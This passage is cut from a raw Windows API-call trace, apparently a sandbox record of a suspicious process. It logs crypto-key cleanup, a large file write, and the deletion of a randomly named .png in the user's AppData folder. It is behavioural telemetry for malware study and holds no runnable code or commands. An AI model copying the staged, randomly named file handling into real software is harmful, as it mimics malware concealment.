out: lpMsg=0x8cf3b8) returned 0 [0122.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.015] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.015] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.015] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.015] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.015] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.015] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.015] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.015] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.015] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.015] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.015] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.015] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.015] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.015] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.016] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.016] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.016] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.016] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.016] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.023] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.023] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.023] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.024] WriteFile (in: hFile=0x4f4, lpBuffer=0x2aaf410*, nNumberOfBytesToWrite=0x14d08, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesWritten=0x8cf5e4*=0x14d08, lpOverlapped=0x0) returned 1 [0122.028] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.028] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.028] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0122.028] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.028] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0122.028] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.028] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.028] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.028] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.028] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.028] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.028] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa4b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.029] CryptDestroyKey (hKey=0x9a47c0) returned 1 [0122.029] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.029] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.029] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.029] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.029] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.029] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.029] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.029] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.029] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.029] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.029] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.029] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.029] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.029] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.029] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.029] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.029] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.029] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.029] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.029] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.029] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.029] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.030] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.030] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.030] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.030] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.030] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.030] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.030] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.030] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.030] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.030] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.030] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.030] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.030] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.030] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.030] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.030] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.030] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.030] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.030] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.030] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.030] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.030] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.030] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.031] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.031] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.031] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.031] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.031] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.031] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.031] CryptReleaseContext (hProv=0x9bf440, dwFlags=0x0) returned 1 [0122.031] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.031] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.031] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.031] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.031] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.031] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.031] FreeLibrary (hLibModule=0x76390000) returned 1 [0122.031] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.031] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.031] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.031] CloseHandle (hObject=0x4f0) returned 1 [0122.033] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.033] CloseHandle (hObject=0x4f4) returned 1 [0122.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.094] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.094] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.094] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0122.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0122.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0122.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0122.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0122.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0122.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0122.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0122.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0122.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6e) returned 0x29f3ee0 [0122.095] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DjTk 0Dq17Pz4t2AMa.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\DjTk 0Dq17Pz4t2AMa.png", lpFilePart=0x8cedf4*="DjTk 0Dq17Pz4t2AMa.png") returned 0x36 [0122.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0122.095] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DjTk 0Dq17Pz4t2AMa.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\djtk 0dq17pz4t2ama.png")) returned 0x20 [0122.095] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DjTk 0Dq17Pz4t2AMa.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c861d80, ftCreationTime.dwHighDateTime=0x1d5cf37, ftLastAccessTime.dwLowDateTime=0x3c29f900, ftLastAccessTime.dwHighDateTime=0x1d5d602, ftLastWriteTime.dwLowDateTime=0x3c29f900, ftLastWriteTime.dwHighDateTime=0x1d5d602, nFileSizeHigh=0x0, nFileSizeLow=0x14d04, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="DjTk 0Dq17Pz4t2AMa.png", cAlternateFileName="DJTK0D~1.PNG")) returned 0x9a47c0 [0122.095] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DjTk 0Dq17Pz4t2AMa.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\djtk 0dq17pz4t2ama.png")) returned 1 [0122.220] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c861d80, ftCreationTime.dwHighDateTime=0x1d5cf37, ftLastAccessTime.dwLowDateTime=0x3c29f900, ftLastAccessTime.dwHighDateTime=0x1d5d602, ftLastWriteTime.dwLowDateTime=0x3c29f900, ftLastWriteTime.dwHighDateTime=0x1d5d602, nFileSizeHigh=0x0, nFileSizeLow=0x14d04, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="DjTk 0Dq17Pz4t2AMa.png", cAlternateFileName="DJTK0D~1.PNG")) returned 0 [0122.220] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0122.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.220] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0122.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0122.221] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0122.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0122.221] GetEnvironmentVariableW 